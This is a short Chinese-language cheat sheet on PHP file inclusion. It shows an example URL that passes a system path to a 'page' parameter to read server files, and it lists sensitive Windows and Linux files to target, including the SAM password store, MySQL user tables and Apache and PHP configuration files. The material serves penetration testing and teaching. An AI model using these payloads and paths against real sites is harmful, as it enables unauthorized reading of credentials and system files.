檔案包含之銘感目錄

PHP檔案包含利用

(1). 讀取敏感檔案

訪問:

 http://www.xxser.com/index.php?page=/etc/password

如果目標主機檔案存在，並切有相應的許可權，就可以讀出檔案的內容。反之，會得到一個類似與: open_basedirrestriction in effect的警告

常見敏感資訊如下:
win:
C:\boot.ini                                       //檢視系統版本
C:\windows\system32\instsrv\MetaBase.xml          //IIS配置檔案
C:\windows\repair\sam                             //儲存Windows系統初次安裝的密碼
C:\Program Files\mysql\my.ini                     //mysql配置
C:\Program Files\mysql\data\mysql\user.MYD        //Mysql root
C:\Windows\php.ini                                //php配置資訊
C:\Windows\my.ini                                 //Mysql配置資訊

 UNIX/Linux
/etc/passwd                                       
/usr/local/app/apache2/conf/extra/httped-vhosts.conf //虛擬網路設定
/usr/local/app/apache2/conf/httpd.conf               //apache2預設配置檔案
/usr/local/app/php5/lib/php.ini                      //php相關設定
/etc/httpd/conf/httpd.conf                           //apache配置檔案

/etc/my.conf                                         //Mysql配置檔案